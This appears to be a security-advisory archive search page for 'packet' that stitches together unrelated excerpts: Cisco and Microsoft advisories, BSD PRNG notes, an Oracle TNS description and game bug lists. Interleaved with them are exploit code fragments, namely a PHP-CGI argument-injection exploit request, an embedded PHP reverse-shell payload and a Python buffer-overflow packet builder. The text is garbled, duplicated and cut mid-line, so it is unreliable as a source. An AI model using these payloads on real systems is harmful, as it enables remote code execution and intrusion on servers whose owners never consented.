Next Page >>
packets
advisory outlines the details of these vulnerabilities:
* VPN Authentication Bypass when Account Override Feature is Used
vulnerability
* Crafted HTTP packet denial of service (DoS) vulnerability
* Crafted TCP Packet DoS vulnerability
* Crafted H.323 packet DoS vulnerability
3. *Vulnerability Description*
A security vulnerability was found in the driver 'vmswitch.sys',
associated to the Windows Hypervisor subsystem, allowing an
authenticated local DoS. The vulnerability could allow denial of service
if a specially crafted packet is sent to the VMBus by an authenticated
user in one of the guest virtual machines hosted by the Hyper-V server.
The impact is all guests on that host became non-responsive.
An attacker must have valid logon credentials and be able to send
specially crafted content from a guest virtual machine to exploit this
</tr>
</tbody>
</table>
</body></html>';
function sendpacket($packet,$response = 0,$output = 0,$s=0)
{
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
global $proxy, $host, $port, $html, $user, $pass;
if ($proxy == '')
{
| | All versions | All versions |
| Privilege Escalation Vulnerability | prior to A1 | prior to A2 |
| | (8a) | (1.2) |
|-------------------------------------+--------------+--------------|
| | All versions | All versions |
| Crafted SSH Packet Vulnerability | prior to A3 | prior to A2 |
| | (2.1) | (1.3) |
|-------------------------------------+--------------+--------------|
| Crafted Simple Network Management | All versions | All versions |
| Protocol version 2 (SNMPv2) Packet | prior to A3 | prior to A2 |
| Vulnerability | (2.1) | (1.3) |
+--------------------------------------------------------------------
Summary
=======
Two crafted packet vulnerabilities exist in the Cisco PIX 500 Series
Security Appliance (PIX) and the Cisco 5500 Series Adaptive Security
Appliance (ASA) that may result in a reload of the device. These
vulnerabilities are triggered during processing of Media Gateway
Control Protocol (MGCP) packets, or during processing of Transport
Layer Security (TLS) traffic that terminates on the PIX or ASA security
Summary
=======
Cisco IOS contains multiple vulnerabilities in the Data-link
Switching (DLSw) feature that may result in a reload or memory leaks
when processing specially crafted UDP or IP Protocol 91 packets.
Cisco has released free software updates that address these
vulnerabilities. Workarounds are available to mitigate the effects of
these vulnerabilities.
Multiple vulnerabilities exist in the Cisco ASA 5500 Series Adaptive
Security Appliances and Cisco PIX Security Appliances. This security
advisory outlines details of these vulnerabilities:
* Crafted TCP ACK Packet Vulnerability
* Crafted TLS Packet Vulnerability
* Instant Messenger Inspection Vulnerability
* Vulnerability Scan Denial of Service
* Control-plane Access Control List Vulnerability
LDAP)
* Session Initiation Protocol (Multiple vulnerabilities)
* H.323 protocol
All the vulnerabilities described in this document are caused by
packets in transit on the affected devices when those packets require
application layer translation.
Cisco has released free software updates that address these
vulnerabilities.
Summary
=======
Cisco IOS Software is affected by two vulnerabilities that cause a
Cisco IOS device to reload when processing IP version 6 (IPv6)
packets over a Multiprotocol Label Switching (MPLS) domain. These
vulnerabilities are:
* Crafted IPv6 Packet May Cause MPLS-Configured Device to Reload
* ICMPv6 Packet May Cause MPLS-Configured Device to Reload
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
DragonFlyBSD (the 3 latter O/S however only use this PRNG when
the kernel flag net.inet.ip.random_id is set to 1; it is 0 by
default, resulting in a sequential counter to be used instead...).
OpenBSD, NetBSD and FreeBSD also use this PRNG for IP
fragmentation ID normalization feature (e.g. "scrub out random-
id") in the packet filter module.
Somewhat more distant flavors are used for various IPv6 fields
across many BSD operating systems, which may be affected, and
some other O/S not mentioned here, including possibly non-BSD O/S
may be affected, since this code seems to have been extensively
> DragonFlyBSD (the 3 latter O/S however only use this PRNG when
> the kernel flag net.inet.ip.random_id is set to 1; it is 0 by
> default, resulting in a sequential counter to be used instead...).
> OpenBSD, NetBSD and FreeBSD also use this PRNG for IP
> fragmentation ID normalization feature (e.g. "scrub out random-
> id") in the packet filter module.
>
> Somewhat more distant flavors are used for various IPv6 fields
> across many BSD operating systems, which may be affected, and
> some other O/S not mentioned here, including possibly non-BSD O/S
> may be affected, since this code seems to have been extensively
\$read_a)) {if (\$debug) printit(\"STDERR READ\");\$input =
fread(\$pipes[2], \$chunk_size); if (\$debug) printit(\"STDERR:
\$input\");fwrite(\$sock,
\$input);}}fclose(\$sock);fclose(\$pipes[0]);fclose(\$pipes[1]);fclose(\$pipes[2]);proc_close(\$process);function printit (\$string) {if (!\$daemon) {print \"\$string\n\";}}
?>";
$packet = "POST
".$p."/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input
HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: PHP CGI Argument Injection Exploiter\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
1) File transfer directory traversal (CVE-2008-1117): The '\' and '/'
are not properly sanitized when checking the destination filename. The
problem resides in the Notes feature implemented by tb2ftp.dll loaded by
the tb2pro.exe. This is the main issue.
2) Log input manipulation (CVE-2008-1118): Several fields of the packet
containing peer information (computer name, user name and IP address)
are taken from the packet sent to the target and used to display this
information on the screen of the target.
The vulnerabilities discovered allow a remote attacker to upload a file
+--------------------------------------------------------------------
Summary
=======
Two crafted packet vulnerabilities exist in the Cisco Firewall
Services Module (FWSM) that may result in a reload of the FWSM. These
vulnerabilities can be triggered during the processing of HTTPS
requests, or during the processing of Media Gateway Control Protocol
(MGCP) packets.
*Vulnerability Description*
The Borland Interbase 2007 database server [1] is vulnerable to an
integer overflow when a malformed packet is sent to the default TCP port
3050. The integer overflow can cause a stack overflow, which allows
arbitrary code execution with system privileges.
*Vulnerable Packages*
+-------------------------------------------------------------------+
Workarounds
===========
Workarounds consist of filtering packets that are sent to 127.0.0.0/8
range and UDP packets that are sent to port 1975.
Using Interface Access Control Lists
+-----------------------------------
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
if (($s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) == false)
die("\nsocket_create(): " . socket_strerror($s) . "\n");
if (socket_connect($s, $host, 80) == false)
=======
Cisco ASA 5500 Series Adaptive Security Appliances are affected by the
following vulnerabilities:
* Transparent Firewall Packet Buffer Exhaustion Vulnerability
* Skinny Client Control Protocol (SCCP) Inspection Denial of
Service Vulnerability
* Routing Information Protocol (RIP) Denial of Service
Vulnerability
* Unauthorized File System Access Vulnerability
Vulnerability and Exploit: Javier Vicente Vallejo, http://www.vallejo.cc
Vulnerability Analysis: Ruben Santamarta, http://www.reversemode.com
Abstract
Microsoft Windows is prone to a remote Kernel Denial of Service due to the way srv.sys handles malformed WRITE_ANDX SMB packets.
Remote attackers could exploit this issue without having valid credentials on the target machine. In order to achieve a successful exploitation, the attacker needs enough privileges to remotely send WRITE_ANDX packets to an interface that uses a Named Pipe as endpoint. Those interfaces that allow NULL Sessions vary between Windows versions, in Vista the reliability of a preauth attack through the “\LSARPC” has been successfully demonstrated.
Affected versions
Several flaws were found leading to attacks such as generation of
duplicate challenges/nonces and challenge/nonce prediction.
The randomness of the 8-byte challenges generated by the SMB server in
response to an specific packet requesting authentication is bad enabling
attackers to perform replay attacks. The SMB server easily generates
duplicate 8-byte challenges.
The challenge/nonce prediction attack is feasible due to several factors
including that the protocol leaks information that can be used by an
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(target)
path = 'A' * 5000
packet = pack('<L', 0x20003220)
packet += pack('<L', 0x00302000)
packet += '\x20'
packet += pack('>H', 0x0020)
packet += pack('<L', 0x00432000)
packet += pack('<L', 0x00303220)
-this is the reason why I say it's probably vulnerable since this
version, however, I didn't tested with such old database servers- and is
currently used in Oracle 11g as well as in Oracle9i and 10g. The process
of registering an instance is as follows:
1. The client sends a TNS packet of type CONNECT (TNS_TYPE_CONNECT = 1)
to the TNS Listener with the following NV string:
○ Oracle 9i to 11g: (CONNECT_DATA=(COMMAND=SERVICE_REGISTER_NSGR))
○ Oracle 8i: (CONNECT_DATA=(COMMAND=SERVICE_REGISTER))
2. The server answers with a TNS packet of type ACCEPT (TNS_TYPE_ACCEPT
= 2). After this, the protocol communication changes a bit (all data
=======
Cisco IOS software configured for IOS firewall Application Inspection
Control (AIC) with a HTTP configured application-specific policy are
vulnerable to a Denial of Service when processing a specific
malformed HTTP transit packet. Successful exploitation of the
vulnerability may result in a reload of the affected device.
Cisco has released free software updates that address this
vulnerability.
- ---------------------------------------------------------------------
Summary
=======
Two crafted Protocol Independent Multicast (PIM) packet
vulnerabilities exist in Cisco IOS software that may lead to a denial
of service (DoS) condition. Cisco has released free software updates
that address these vulnerabilities. Workarounds that mitigate these
vulnerabilities are available.
Actively exploited: Yes
Exploit Discovery
------------------
I was analyzing packets for an application of my own to figure out an
issue with my own protocol when I noticed I was receiving packets that
looked similar to that of IRC, so I decided to take a break from my own
project and figure out what application it was. I noticed it was the
voice communication and chat program called GSC. Since I was bored I
figured I would poke around at some of these packets.
Application: Dropteam
http://www.battlefront.com/products/dropteam/news.html
Versions: <= 1.3.3
Platforms: Windows, Linux and Mac
Bugs: A] format string through packet 0x01
B] buffer-overflow through packet 0x5c
C] heap-overflow through packet 0x18
D] various memory crash through packet 0x4b
E] account password sent to server
Exploitation: remote, versus server
Cisco Unified Communications Manager contains five (5) denial of
service (DoS) vulnerabilities.
Cisco has released free software updates for affected versions of
Cisco Unified Communications Manager to address the vulnerabilities.
A workaround exists for the SIP and Packet Capture Service DoS
vulnerabilities.
This advisory is posted at:
http://www.cisco.com/warp/public/707/cisco-sa-20110824-cucm.shtml
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Cisco Security Advisory: Cisco NX-OS Malformed IP Packet Denial of
Service Vulnerability
Advisory ID: cisco-sa-20120215-nxos
Revision 1.0
Next Page>>
|
